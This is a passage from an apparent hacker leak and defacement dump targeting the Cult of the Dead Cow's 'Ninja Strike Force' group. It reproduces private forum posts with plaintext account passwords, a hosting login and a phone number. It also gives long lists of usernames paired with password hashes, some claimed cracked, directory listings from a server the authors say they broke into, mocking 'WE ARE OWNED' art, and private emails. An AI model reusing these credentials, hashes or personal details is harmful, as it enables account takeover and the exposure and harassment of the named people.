onto:\r\n\r\nhttp://www.nsf-osc.com\r\n\r\nyour user name is: tesla\r\nyour password is: ju6Ha4RA\r\n\r\nyrs. trly., \r\ntrammel\r\ncDc-NSF\r\nOffice of Special Circumstances'), (1172,'a8a8bee0c7','I dont want to post links in your topic as it takes away from your deal, but if you ever need full videos, pictures, celebe sex crap and so on you could always use...\r\n\r\nwww.myfreepaysite.com\r\nusername: siphter@gmail.com\r\npassword: shutyoureyes\r\n\r\njust thought I would share if you eventually find yourself in the need for more material.\r\n\r\nunfortianatly nothing tooo disturbing besides a little bit of midget porn and women wearing pig snouts rolling in the mud/getting it on with redneck looking actors *shrugs*.'), (1972,'00c465f4dc','[quote:00c465f4dc]I will probably never get a MySpace account[/quote:00c465f4dc]\r\n\r\nyou can have this one i just got for you :)\r\ni believe you can just change the mail addy and password and thats you sorted. \r\n\r\nIts totally blank and i have entered no personal stuffs on it.\r\n\r\nLogin: \r\nbrok3n_5w0rd@hotmail.co.uk\r\n\r\nPassword: Pr$raTrUde8r?YEpUjubrAVAjuq-Ph-brUCHAthuyevazus-ajESpequ$eD2$res\r\n\r\nlet me know if your taking it or not so i can delete it, if its not needed :P\r\n\r\n :wink:'), (5189,'939ca5f807','oxy do you think you could fix my forums? something happened this morning I think someone purposely crashed it. I dont know much about forums the install and stuff but my whole site is crashed and I didnt change anything. If you get a chance can you take a look at it? \r\nthe hosting site is bluehost.com \r\nthe login is \r\nhouseoflupo.com\r\npassword is \r\nlupo5105539792 \r\nI would really apprieciate it. I am gonna be out working all day but if you can or you see a problem you can call me at 510-409-5805 \r\nI hope you can help \r\nLupo'), (2417,'b53d2e7dec','Heres my old account,\r\n\r\nI took the liberty of resetting the password, do with it what you want.\r\n\r\nUSER: Expl0iter\r\nPASS: 9ggbsqud8qp'), (4896,'3d46021522','Hello HackerJacks,\r\n\r\nhere\'s a mail-address along with the password for the NSF myspace account.\r\n\r\nworld380grab@hotmail.com\r\n\r\nzvud39eq\r\n\r\nGo ahead and experiment... when you have the time and when you\'re feelin\' creative. \r\n\r\n(I believe that Trammel, you and me are enough of people to mix with it - we can continue to post new ideas and changes in the NSF forum, so we\'re all open and directly open for eventual feedbacks)\r\n\r\n\r\nPrison System'); (777,'a92b1f454b','Your User ID is: 24871\r\nYour Nickname is: anonymous1985\r\nYour Password is: ySI@9#aUuL\r\nComments:\r\nAccount\'s expirationdate: Lifetime\r\n\r\nyou can download some ebooks (Directory) from there!\r\n\r\nc ya'), ftp://netherplex.ath.cx\r\nusername: cdc\r\npassword: bowtothecow ~~~~~~~~~~~~~~~~~~~~~~ This is our first batch of hashes from CDC sites. Overall we have hundreds cracked, many from this batch. Ratte:051ac3686b8abe43c5edc6104eafcbd9 Myles Long:041b04c50d21dd5b395bf6c0cf14021c THE NIGHTSTALKER:c2cea03312c672df706b17a73776e7ec Phobes.:e62b81ab40fcd2b00dcd85872059b702 Zodiac Lung:6e14abde32362461479b6eb142c1ac8c crash.the.greenhat:168a9fde3dbf064581b5a70dfaa6d720 Deth Veggie:e2a74f8237efa357701566ef7df3847c G.A. Ellsworth:99c578e2573657a1c1199277a88ebbdb Comrade Smack:566878e0be809a762ba96ae555669237 tenko 2.0:fa4861da7f8dd99fa6684f71d1e8fcb3 C+Ace:86db7eb681baa16d04788d5ea7e9339a M��se:0002579ac5d8341f9e0b9cad54b93e54 Lizzie Borden:3b8ec70648c7c65c4706ed15ed3a9764 Razor Sun:a9137015501a9d3126a6da851fa641cc Smoking Samurai:b7ccd6ef2722c6651d054e39b936c100 cracking man:250c4a1ad1f0eb6851bbbde570446c57 E-Young:2954a75a99c9f007642c77b5a88c9c37 Thomas-Gonzalez:e2a07aebcca338b80d255a974da46392 Alien FX Fiend�:ef166a234ab2355ed86941beb11052c2 Bucephalus Bill:ac710609337b35b6f8bb316cb8cee699 TERMINAL ILLNESS:213fbf04308243bbf926fddce394bb31 Black Hawk:7b28355ee66f6104410879b8c1c4c579 bradley.strider:6a5d0040d95557abfcddb562659a7db3 Kunt-magiK:13202e9f52832708bec42341fbf29c10 desert disciple:a6918cbdec446566822f4dd52846b3c2 Dr. Obscure:5213097ccbffbfd3dd262860a3c15afc Knob Macabre:ad198a36c4a282982870e3e2e65ae3c6 Murder Mouse:11fc8dce5f80a336286eb6742b52607a The Fat Controller:3501e91721f4d44c1fba1d450cd96e9b Oliver Johnson:9119cd2303a26ca2ceb0a20e3baf5444 Script.lord:8338d353f1ee7a23e20e733a8ac78aeb Dark by Design:2a167bd2ada0d057f1ce8c80354cec36 Prison System:97e680069d0f40d03c2413d74d86c26e techno.phreaky:94cb8f5d29c10533cc6195f70466054f mInD-fUCker:109b856c1c5d5deeeb213ef2116abdd8 cobra commander:90eb5a154fdce42cf9156e91a1ac0ca7 Tuff McQueen:6b8dc2fc513873cece34e2b206f7c2be Robert London White:ec09439c9e2d0096328122976c36f34e Enigma++:0289c05ce4675b7ca3cc7b97588715cf (Erus_Gulielmus):a32847f941dbbecc245d6457fe8baee6 H@x0R:1991583a74d7e2f1b5bc566c90f8eba0 St.Michael:6e4dc8789c4c44329db1b54b1bfa67c0 concious.dork:0ae1b5455e1664fe3ccbdb0bdc09ac45 XianGen-Cyberian:9a5a8c3bad367dd94fb2a2a6264ef262 Max Payne:9d8d214774072d4f898e2c1dfbd83e06 Miss V:57918bd0392843f81e8c8b9a5bb5bd6c sp�cemoses:7584702f0d510bb60f7518099554f934 Albino Rhino:83b3dca6eb79a6e76f5b0be342394269 terminal bliss:5ef64bad8f9d7e0c85f821580e4d6629 Electric Synapse:06d6984ec68cc222f1cc2889027e07bf .r00t.:410de21c4f9b8b1f315061fd486ff84e The disciple:a3e2a6cbf4437e50816a60a64375490e Jonathon-RossBBC:e42d0f1d5dd2e6e939db87fb4b84bfeb Shadow[King]:1198fff1e6c597fafef5ad7275a615f2 Forex Autopilot:ad39f31800eb1f80893e97de59f9cf9d ��� ����:2070575d7b50aead682cb4fd3296d363 Online Forex Trading:ad39f31800eb1f80893e97de59f9cf9d ������ ���������� ������:22d45e839622e3f274eb9967639d0e34 muza-mp:a84d7b154314a6b13a83ee8248e8c471 Expemelve, 6, 10]:bb73cc1bdf2d625cccd110a4a55c3802 ID 1792351271490:4b28268c60712474ece8cbb1b35963ad f!lu:c0cd808c7777432515bc71bde6ec91cf am cheap link maxpages.co:cb572c9f55143058d1cc585b5ee2376d hanse jumi:927b812982ff876497f1687e9c7b3982 Area 51:5f4dcc3b5aa765d61d8327deb882cf99 Alex Sheredan:5864396db6a69353aebcee625715c569 abs-akb.ru:30f777b51a6d3bda47413d5a76dbdea0 Altix-Pracownicy:d86f732093f64c90ec2f13537950ce12 rand_seed:50ed9fd20c745885b7272c615462fe3c elliot:31d633afa4a59dbdea092c205d70e728 PhrenchToast:a0949786136090042cd6347f340502b0 hardwire:9a4336a169bfdee858a6fc59ab2d288f punkle:b7c14d6a7409cf1180d0ffd193dd79b6 Devolish:eb33ae1ff7ca2dabb87413d804601548 jtesta:4edfa4371d4a5c37ffac0826cd8eded9 KEMiKAL:3a9cb7722e527f11b887ec522151f3bf oxycolton:066e35354d1a9a729479ffee44f05daf MiB:3e39d801245868d79bf5ab7272028ba6 Flack:2b2ccb175239cae64c837304e720aa25 diskrez:13202e9f52832708bec42341fbf29c10 trammel:48622ee13d958d6ebc9c6767970bd018 Delchi:4fd19c09606270a5c0c5e7589430604d ndb:b4fcc5bbea2edad406f481406344198b Omnininja:a0886448f38e32abc6063bc71fb6143f Major_Small:5eb86157f52125281b73ba5467ca9000 Seahawk:2d46f6286511bd2e22f9c02907274872 javaman:873642673b3e109b7e29cdc405220da4 hexcrasher:9bfcd76aa225795c7c5e2ea8a65deef4 blair:51c46caa0cb9ab9a734d57f9de90fb7f romoe69:46a3a57ba68e0411b1e20de64ac864e0 GreenDiamond:298ba7ab72b23bfbe47fb587a8c685a0 Lupo:857e092b039831db7c560589c27d8581 Oxblood:873c86bd9489bdb9bc4701cd6ed5b148 e4cf17:606b187995d931d432455cf6a1da7e13 xen_ix:17d50dd10685dabb24cc2baa5dcbf95a Bjarki:b5f1460aa7fce17ea92fc90064c32372 Artough:51d320aa4c3e0044adc76c32f9ee1537 xxxclusive:7f796692038e6e4d5357ac154d2f9fa7 Arrakis:0c184ae1170cbcf85e332005fb826847 n0vashinrh0n:d4d103b63c3894d443c02027a0874763 b0bsquish:5f4dcc3b5aa765d61d8327deb882cf99 screv:ddb4d8f124c2b2d98e0db9401acfb3f5 psg:dc23b9d50ed76bd6b86ca2f0a2273871 1justin:0a9a24e386a2e574f67eaad188882960 blizzocan:a955c56e9465c01ac341080ae1a07d1e xardoz:d5b3aa4417f55a9025749cca2d196ac1 gauss:a8f223f158b5214f73e4b2520bfbd7d8 Eron:89659c52d996d2b1d52cb200ef53e0cc 0x0B4F1E:0b7d7b9483c0c7d6aa7c016918567624 bky:dd67354489b7f34533ceb009e6831d7f powerpork:c4557e8fbedb16fa5c0360d813b25552 five:ad198a36c4a282982870e3e2e65ae3c6 viraptor:3168ce9eb7dfb8c59bc6a59e894d773f talonprime:8b65996657feab900109f216f4b951b6 emonk:82f0035fbb0c2ef33b1b672b82410fdd HackerJacks:4ff9fc6e4e5d5f590c4f2134a8cc96d1 Yoder:70b9657e0e3f757994ea46c531cc4a81 bunker_mole:11c7d03bca67172930c441f5de48d6ea Dr_Brain:b3c437a88ac17986943e01ef2138d1cb mneumonic:f7cc0816f76e4deeba470587c91df43a picklejuice:e7be4ab4bf5f114040e0a65215602787 Ketamine:bb358eb6ff2cc1090440672054575989 SketcH:30f3d2c47ee2a972cd30ca6af4e22859 livet0die:7c32b256d3b699444f2a8973de12fe54 olorin:a6d711410b1935a68b7a1b958d72eed4 darksorcerer:a83c83714f5a0cb6af6920981d9c26c8 data:da41a32705178dee05b7bb467e1c03c8 THat:d10096a9193be0834de0be5d516dbd49 dildog:d579d6458828f0765c9d53d155e45dea lowlux:f49ac0580e48a2437fcbac2f91cd3e28 EyeEatBabies:eb0a191797624dd3a48fa681d3061212 Andsu:f112263a7306667b5bd7c50d1d9b36db President_Z0mbie:745cca4b603e4b964323e903f8fd9641 BlaCk_eYe:059b39e1caaaf47400e93a3603665537 JAmes:e9130da0c8ae54b547e29692f9755d43 ziader:3fd6b6210e33bb046e69f256a138e28d Zake:26d09d93c921ceb2345f64eff4f5afa1 Kale:769ac34a4012ab69c069de0bab7d9e81 eep:4ac5376990919861672b2339f030ba38 twodeadclerks:711b4ff5e4b873c36c59430cc1ec07a9 ilikeitlong:3e1eac855d4e6b1d89ce38562b567161 Coyote:4d9bf358d47ca6000d3a7efd000d1399 C4li:1fb822d4cd10d6668cebda99c0bda7f6 UsAr:ad921d60486366258809553a3db49a4a Synapse:8c1830fd30b6a1e9a3500fe171831ccc dandanthemuffinman:48c9b232a43faf43306be988fe13c448 netf1r3:56df7567866562d307ad6c9033f4ca77 FreakyKid:94570475400b54a048fd3751d02e4ab7 Itachi:4fb313b758546bf0e9233998cde252e4 guimberstein:82cc783c70e23a8db8ffd42aa1478305 Mitt3ns:d162e0f138236116da423d16f895d52b kevin:8f30aaff82ff04ba82c9de73ca54662c lowtec:65d4dbaa8795667f7348da0f412b1821 batch:10b3917a4ceb166514d9a21365f4064d VoiceOfAnarchy:8885137029b1660987835a801644c6a6 fiend:c8e93626191a59ea5d04fd93280d04d9 niles:5297b609864f97c7386aa4adf47e7e40 Yogaboy1:bb7b3bf5da4be50a0d6d704d62e40424 frost_bite:16117430a59745a71ada3bc32fa4bcd1 Circuitbomb:63e30cd76dd8fc1d3125fa49c18988f9 Zm0g:b031bc78e9a65f1ab6b67c6f65f0263f 41ffa8:6cad5ca90cc4ef023a40ad03bf554bc0 bamfninja:0928ccc7e05f86ebeecdb991a92892a5 Tesla:c90907d87411dcd2776ac3f3b424db51 Dragon:804ecc3f1cb809d390233c24998787a1 danhorse:7168831f3009f4f6365a63434c9f2128 Brok3n:8e9f7dc871d93cf7820fb77ae00de68f draphur:9a6cf7cde75d0d465d434625f8d16980 Phalmos:dffee2242d9707cc0c7ad1d6c9c3306f Lagato:3ddba2b624d97be3868625fb9de3193d WarizWizard:7fed6412e317e20cd4fb612b8a49104e rude_b0i:78bfb5213c9c7214c2018a3e488d2dd7 Tigger:551c3dea75ae8ce63aca56b886033f03 skavenger:bcbba6ea168dd085d4c8ca33c0b2b74d Shardin:4f3448839842418bb5c539e3281ced8a BadLuck:e3c457dcaa297645765a25bacd628c31 ToAsT:332b415377e44d3c540e1d1d6f1567f2 NewYorkCityDJ1:60923b534bd6546d6c6ae3919bd098ee Swordoath:5532d3445adc38872b35e28b49a90ebe GrimReaper:b811200981f92189f52007b5f415d6b3 Globetrott:e16341542a9e826f53505da7cd8b79bf opscure:dfa410a0fbac3a2e5983192b73b03f3f Pink_Sock:0229701f49f9c56ad98d1841296e8094 Synked:8e45bb741588f3069381464a2ac80833 8558a0:0906463c48177ca8125395430b12a90c Monarch73:d58295f6b3fb30f0c66af9f7f8a7cfd9 fc9066:a3778021c56580c2ab1a47ba106eb391 jr4199:4aec1b90bcc2b114d7c2b59b34531c75 kevinownu:d2e7a2105d0fb461fe6f2858cc33942f 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Fksxneng:84260be2f4c47211604c89d3917ec4e9 ggdesc:191c2392a09fd78347751e881f95ff50 Jxkitxuu:757da86979d889655638001914981c40 usernamelistingsusk:8945b4cb1bfb8cb5c95c137fc60ed9a0 Moftaffiz:9287f59186e762383e49d85e95d720b3 Qmebgzaz:a1b78efe1d968ec0939b72338f9925f2 Rortithrounny:1b9489603998b1eb6f89011dc7699e6e Ndptbudd:04dc94c3c8ec7081cb65acc0d4a3447e mamibspoivac:1a9d34a1789b1a6fd83a3288a309c24f butigioi:493de4012d663e23f15ef00a84b22165 Qbmlztdy:4266f0e69423bcd07ef009dc5826ced6 Mooodcze:85a8231f54a592d05fa9aaaee75af540 FiksatiDyadya:6a39728b44b4ceefa9b4fc5738737d4e jiliaBiosaups:0f55ac36dea067850b19288e2f7a5f91 Jqwmbihz:b5e56d0ea5e30b80005a5e53049cb957 brightonsmiley:6987cd1a52655b6f830746ecb52e4254 igimugii:c6858bfc4d5b61b3037f8d472c3a1b4d datingcrew:4ffcb41a55d4ddb32a87334d3de24936 jimmycougar:6b410bc656f687416ca717ff7f3adf57 kpofcycljj:58c8ed972161abd5a17fae80ee58fe09 Ensrqcvx:4d056b58b922eca32169635cb2e61e70 Nicihntm:17bb6f24d7c373a906ef4e8793b6acaa Axbkpbmd:d31ff0d73922a54be25f40468754153d Kimbystymil:d482ffb70e110018e90325fe3dc62f2a Zhpfncnh:678a81f3f74e30c80d3fd7e9157e5ab8 diebradrabdoblea:2880b4de878ee185b817154e6eba0bdd InfommaBymn:94ed49497346e14c6cf954d51ba8e7db snezoriayb:58c8ed972161abd5a17fae80ee58fe09 Drdccyoi:5c3f15ad201c8bb1bf5ce4cbc796d2cc Pimkkmya:2e6c99b2dc22f9bdc0740524b7733ffe jpdanis:cc6fda6a88ba5ac8366346577076ff1e Shikaka:863dcf76708f2d0efde7fd5f5df81f04 Tromebroard:3c1b633ba4a80d42d40b92d2ad7fda66 Seeroideonrak:a8abddca4fb159b3e0827a2d43b3cc1b inittinnykige:61ecc73f0a012e1b05bf1cb42675bacb FNeroGmbh:6e75cdc6fab0686e7ef51efd3c1aca56 Awaitteintigoas:ade5d38e0da4a8c946de2dc2529de7d9 promodownload:7d54a9a9010ae369bb5458b007c44e82 Cgvizega:922b7cf17961831842ce7f513a79e40c jeodelarryild:865922516243a0c9b62c5ac59539240f dero:994f94eb24f4a350859e8ba0d131ec37 ZybanProff:8b18cb9f624851c3f97852d16da3330d Qwjyrgij:90fc95a80e443a99930f441be996383c duesthuff:9b588ed8d1525b3360e9d8b9bca3f283 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Ratte:CFfFcLcUZle/k Tarkin Darklighter:xzPKiWz8QTXvk Count Zero:1X/noJiJmuDo. Hella Kitty:j8jv.kfrcfeFA Sunspot:gdO2ytGEpOytI Reid Fleming:DtDcPtq5zQm2Q xxxclusive:ve1BSQJQTw.5w Oxblood Ruffin:1LdqfLrPwVX7A Krass Katt:VCF440Kz/QesY Dark Sorcerer:pEe5gI/W2furI Myles Long:t3Ky34tLMlSwA Javaman:PKrqiDTnqCAOQ assrabbit:LqNmR9yVnFW.c Necrovore:R9baORRE/MAFo Omega:uGW2BF8i6CYUw THE NIGHTSTALKER:2Q.RTf3XxTyuo Dil Dog:gKrFNEzeE81TE cDc communications:aAwVhjTDJY94Y Deth Vegetable:z3/lohkRD4iSM Obscure Images:B9Ayyw7aM2N9g Carrie Carolin:T0/tbH3MtuTaA Tweety Fish:kxxDeVzQ7xG4g Drunk Fux:mYohCcCA49feo White Knight:uPDxxVSZ5XyaI DaYuM:JXfb8NMPyJc96 G.A. Ellsworth:wmnAbTjll5SCs Mixter:W8i6Hq3WR2/O2 Lord Digital:F8kuHzTTuIguc Sir Dystic:6nfgVLh7RH59. Franken Gibe:NuvW9JdLi.dFs Mudge:ao3Kxv2Y05MeI Tequila Willy:IBxlxRuzhqAGg WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED Ninja Strike Force Wow, with a name like that you'd be forgiven for thinking that it is a ELEET special operations team; members consisting of people with the same skill level as a Bruce Lee / Schwarzenegger love child. They are, in their terms, the "mighty and the chosen". It's the Cult of the Dead Cow's most eleet of eleet! the cream of the crop! the best collection of _hackers_ that they have collected. "Membership in the NSF is granted by the cDc to those individuals who stand out in their support of the cDc and its ideals. Members are recognized for their abilities, capabilities, and being the best of the best in their skills." We don't really need to rag on them, they admit that this sorry team of self-obsessed bloggers is the best they have. As you look a little deeper though, you figure out it's hosted by Flack. Now Flack is an all-around nice guy, he can't tell a lie, he has no scene ego and he isn't a hacker (he even admitted on their secret forum that his box is "probably" ownable). So why the hell would you host your stupid site on his webserver, relying on him to secure your ninja stronghold? Anyways we did own them, and here's their shit. Oh, before I forget, it's a Windows box, so the hack logs might not be too great. :p $ dir C:\ C:\ 23.02.2008 12:44 1024 .rnd 24.02.2008 13:43 Apps 19.03.2006 01:34 0 AUTOEXEC.BAT 19.03.2006 01:12 208 boot.ini 19.03.2006 01:34 0 CONFIG.SYS 18.02.2008 19:22 Data 22.02.2008 23:00 Documents and Settings 25.08.2006 17:36 HP 19.03.2006 01:34 0 IO.SYS 19.03.2006 01:34 0 MSDOS.SYS 17.02.2007 08:03 94720 msizap.exe 26.03.2006 09:26 MSOCache 24.03.2005 19:42 47772 NTDETECT.COM 12.07.2007 16:04 297072 ntldr 03.01.2008 20:44 Path 17.03.2008 15:04 Perl 19.03.2008 14:11 Program Files 07.11.2007 18:49 RECYCLER 19.03.2006 01:40 System Volume Information 09.04.2008 13:48 Temp 23.01.2008 16:29 Temp_Console 15.08.2006 22:42 5048 TMHotFix.log 04.01.2008 14:46 160876 TMPatch.log 09.01.2008 19:40 Video 29.08.2006 21:40 ViewSonic 14.04.2008 21:06 WINDOWS 27.12.2007 16:21 0 wizard.txt 19.03.2006 01:35 wmpub 19.03.2008 13:47 WWW $ dir C:\WWW 20.03.2006 21:39 consoles 15.11.2007 11:03 55 index.php 19.03.2008 15:09 logs 20.03.2006 21:38 ohara 20.03.2006 21:38 programming 15.04.2007 18:03 search 20.03.2006 21:35 starwars 03.01.2008 20:19 surfstats 20.03.2006 21:35 tbh405 28.03.2008 19:36 temp 26.01.2008 16:08 Webmail 24.04.2008 17:58 webmarks 09.01.2008 08:19 www.ezridersokc.com 14.02.2008 12:40 www.ninjastrikeforce.com 04.01.2008 14:39 www.okcinsider.com 04.03.2008 16:47 www.patloisel.com 17.04.2008 10:29 www.peppermintfairy.com 09.11.2007 09:04 www.review-o-matic.com 24.04.2008 17:54 www.robohara.com 07.11.2007 20:38 www.tlpok.org 07.11.2007 20:38 www.traincor.com 20.03.2006 21:30 yukon $ dir C:\WWW\www.ninjastrikeforce.com 16.11.2007 18:12 3262 favicon.ico 19.11.2006 06:56 94 index.php 02.03.2008 20:34 15407 license.txt 29.02.2008 16:09 7638 readme.html 21.01.2008 15:18 temp 09.04.2008 13:50 wp-admin 17.03.2008 21:18 32776 wp-app.php 03.08.2007 00:45 129 wp-atom.php 21.02.2008 22:55 1026 wp-blog-header.php 04.02.2008 19:27 2919 wp-comments-post.php 03.08.2007 00:45 153 wp-commentsrss2.php 24.12.2007 05:34 1288 wp-config-sample.php 07.11.2007 20:31 947 wp-config.php 07.11.2007 20:35 wp-content 03.08.2007 00:45 851 wp-cron.php 19.11.2006 06:56 120 wp-feed.php 26.04.2008 23:33 wp-includes 03.11.2007 16:09 1529 wp-links-opml.php 26.03.2008 07:43 16383 wp-login.php 29.12.2007 18:38 6077 wp-mail.php 18.09.2007 22:23 296 wp-pass.php 03.08.2007 00:45 190 wp-rdf.php 11.10.2006 09:26 251 wp-register.php 03.08.2007 00:45 127 wp-rss.php 03.08.2007 00:45 129 wp-rss2.php 11.03.2008 08:45 14292 wp-settings.php 28.03.2008 06:51 3123 wp-trackback.php 14.03.2008 19:08 68155 xmlrpc.php $ type wp-config.php ~ As you can see, there isn't much here apart from a WP and his hardcoded websites and blogs. Typical. We did manage to grab some oldschool mail spools for you though, so you can get a feel for the day-to-day operations of cdc. This mostly involves talk of secret handshakes, what to name applications, circle jerks.... ~ Return-Path: Received: from eastrmimpi02.cox.net ([]) by eastrmmtai08.cox.net (InterMail vM. 201-2131-130-101-20060113) with ESMTP id <20060816120323.NETG10570.eastrmmtai08.cox.net@eastrmimpi02.cox.net> for ; Wed, 16 Aug 2006 08:03:23 -0400 Received: from phoenix.wks.ciphire.local ([]) by eastrmimpi02.cox.net with IMP id Abyo1V01F5MdQFM0000000 Wed, 16 Aug 2006 07:58:50 -0400 Received: from phoenix.wks.ciphire.local (localhost []) by phoenix.wks.ciphire.local (Postfix) with ESMTP id 7F2DBE40F5 for ; Wed, 16 Aug 2006 14:01:47 +0200 (CEST) Date: Wed, 16 Aug 2006 14:01:46 +0200 From: "Mixter" To: X-Priority: 3 X-MSMail-Priority: Normal Subject: Re: scr00gle? Message-ID: <20060816140146.0893b707@phoenix.wks.ciphire.local> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 In-Reply-To: <30410617.1155561613010.JavaMail.root@centrmwml08.mgt.cox.net> References: <30410617.1155561613010.JavaMail.root@centrmwml08.mgt.cox.net> X-Mailer: Sylpheed-Claws 2.3.1 (GTK+ 2.8.19; i686-pc-linux-gnu) MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Ciphire-Security: plain Hi, and sorry for taking so long. Hmmm. I'm afraid I can't say much about scr00gle, as I'm on Linux and my vmware is broken atm (should be fixed these days though), and also I couldn't find the SOURCE of this anywhere, it contained just docs and an .exe. Are you aware of where to find the source of this app, or would the author cooperate with us? As we'd obviously need it anyhow :) Plus, cross-platform app capability might be cool, too. On Mon, 14 Aug 2006 8:20:12 -0500 wrote: > Mixter, I was wondering if you had had an opportunity to check out scr00gle 1.01 yet, and if that was along the lines of what you were thinking for your app? > > http://www.robohara.com/software/scroogle_101.rar > > The name scr00gle is already taken, but until I/we/whoever can come up with another one, I've kept it as the working name. > > Rob / Flack, cDc-NSF > > PS: Thread in progress here: > http://www.cultdeadcow.com/sekrut/viewtopic.php?t=256 > Return-Path: Received: from fed1rmimpi02.cox.net ([]) by fed1rmmtai15.cox.net (InterMail vM. 201-2131-130-101-20060113) with ESMTP id <20060506230141.GUPU12038.fed1rmmtai15.cox.net@fed1rmimpi02.cox.net> for ; Sat, 6 May 2006 19:01:41 -0400 Received: from ug-out-1314.google.com ([]) by fed1rmimpi02.cox.net with IMP id Vywf1U02e3fEpd60000000 for flack@cox.net; Sat, 06 May 2006 18:56:42 -0400 Received: by ug-out-1314.google.com with SMTP id y2so1109700uge for ; Sat, 06 May 2006 16:01:38 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:cont ent-type:content-transfer-encoding:content-disposition:references:x-google-send er-auth; b=khKcvCatyqU6TCdIc/+w0YunKNN9Ua1GMICOXK6yaSiJrZzef9DHRET3imTtbuYK0d3xZRaZl5kY9 HGP7QLvYYk7jgEN0kx+lmgPoO6Iqy5bxB2Py+DCItrV0RDeyIuwWYA3F8bHexfxe7QRafmuqnOW++Gn wCEgO1qGGfgUeFM= Received: by with SMTP id 1mr378478huq; Sat, 06 May 2006 16:01:38 -0700 (PDT) Received: by with HTTP; Sat, 6 May 2006 16:01:38 -0700 (PDT) Message-ID: <14d2d440605061601k7fcb2441p1ed91c8b3de2c00d@mail.gmail.com> Date: Sat, 6 May 2006 18:01:38 -0500 X-Priority: 3 From: "Myles Long" X-MSMail-Priority: Normal Sender: To: Subject: Re: 405 -- Needs Proofing X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 In-Reply-To: <004a01c67145$b77d4480$0301a8c0@Empire.com> MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="WINDOWS-1252" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <14d2d440605061229p32b1b284jbdded3d934bc767@mail.gmail.com> <004a01c67145$b77d4480$0301a8c0@Empire.com> X-Google-Sender-Auth: 73539a56e1ce58af i thought it was really good. even though it's about 405, it relates quite a bit to 806 (and many other area codes, i'm sure). good work, man. -steev On 5/6/06, flack@cox.net wrote: > Oh wow, awesome. It's not entirely the article I wanted to write but I th= ink > it serves its purpose. I don't know if you can ever completely relate the > nostalgic feelings of "those days" to people who weren't there, but I tri= ed. > > Rob > > ----- Original Message ----- > From: "Myles Long" > To: > Sent: Saturday, May 06, 2006 2:29 PM > Subject: Re: 405 -- Needs Proofing > > > good work, man. sorry for the lack of a response. i just posted it > to the site, after having made only minor changes (i think there were > one or two typos; that's about it). > > thanks for writing this. aww yeah. > > word. > > -steev > > On 4/24/06, flack@cox.net wrote: > > > > Hello Myles Long, > > > > The following is an email sent to you by Flack via your account on s00p= 3r > > s3krut cDc/NSF/Hacktivismo forum. If this message is spam, contains > > abusive or other comments you find offensive please contact the webmast= er > > of the board at the following address: > > > > demonseed@cultdeadcow.com > > > > Include this full email (particularly the headers). Please note that th= e > > reply address to this email has been set to that of Flack. > > > > Message sent to you follows > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > > > Take a gander and see what you think. This has probably been the hardes= t > > file I've ever written for a couple of reasons, so if a couple of parts > > feel forced, that's why. I could use some editing help on this. I know = I'm > > holding up the works at this point. Read over it and tell me what you > > think; any advice at this point is appreciated. > > > > Once I've got this under my belt, the next project is getting > > batch-o-matic ready for release. > > > > --- BOF --- > > > > There's a feeling of nostalgia I get every time I drive past my old > > neighborhood, which isn't far from where I live today. Back when I was = a > > kid my neighborhood was my entire world. My stomping grounds consisted = of > > six connected blocks, surrounded by a creek on two sides and highways o= n > > the other two. From sun up to sun down I was free to roam wherever I > > wished as long as I stayed within the boundaries of my neighborhood. To > > tell you the truth, I'm not sure going past those boundaries ever even > > crossed my mind. > > > > As you get older, perspectives change. When the kids in the neighborhoo= d > > (including myself) turned sixteen we got cars, and our worlds were > > exponentially expanded. Overnight our old neighborhood went from being = the > > coolest place we knew to the most boring place on Earth. Before long al= l > > my friends had graduated from high school and moved away. > > > > Even though the neighborhood looks different these days, I'll always > > treasure my memories, not only of the neighborhood and the people who > > lived there but of all the adventures we had together. No matter how ma= ny > > years or miles come between me and that old place, the stories and > > adventures those of us who grew up there had together will be with me f= or > > the rest of my life. > > > > The same can be said for those of us who grew up behind computer screen= s, > > calling Bulletin Board Systems. Online our neighborhoods were our area > > codes, lines drawn in the sand for us by Ma Bell. As long as I stayed > > within those virtual boundaries, I was free to call whomever I wanted. = The > > people I met through BBSes and the adventures we had together were very > > real and a very big part of my childhood. In fact there are lots of peo= ple > > I met online 20 years ago that I still talk to today. > > > > When it comes to the great BBS era, either you were there or you weren'= t. > > If you weren't, well, you missed out on some incredible times. The > > comradery between users in a local area code will never be matched thro= ugh > > the Internet. Like a gang, those of us from the same area code stuck > > together, ready to take on the world. > > > > My area code was 405. > > > > 405 wasn't much different than any other area code. It wasn't particula= rly > > special or unique in any way. In fact, there's no real reason why 405 > > deserves a tribute dedicated to it over your own local scene. Many of t= he > > stories and ideas that appear here could and probably did apply to your > > area code as well. Unfortunately as many of us have discovered over the > > years, despite being one of the most exciting electronic eras of our > > lives, nobody was taking notes. While there have been attempts at > > documenting the overall history of BBSes (Jason Scott's BBS Documentary > > comes to mind), many of the local legends and escapades =96 not just fr= om > > 405 but from every area code =96 have all but been erased from existenc= e. As > > BBSes were eventually turned off one by one they took their histories w= ith > > them. And more than that, some of my strongest memories from those year= s > > were things that happened in real life, things that didn't even happen > > online. And so, if you'll indulge me for a few lines more, I'd like to > > share with you just a few of my memories from my own noggin about my al= ma > > mater =85 405. > > > > - > > > > Back when I started modeming, there wasn't much of a "scene". For > > starters, everyone was separated by machine type; the Apple users calle= d > > Apple boards, the Commodore users called Commodore boards, the Atari us= ers > > called Atari boards, the PC people called PC boards, and so on. Within > > these groups there were subgroups, the biggest division being between > > those who trafficked in warez and those who didn't. At least in the ear= ly > > days it seemed like boards rarely did both =96 you either ran a warez b= oard > > with paltry message areas, or a message board with everything but warez= . > > Keep in mind that back then, running a warez BBS meant dropping some > > serious cash for 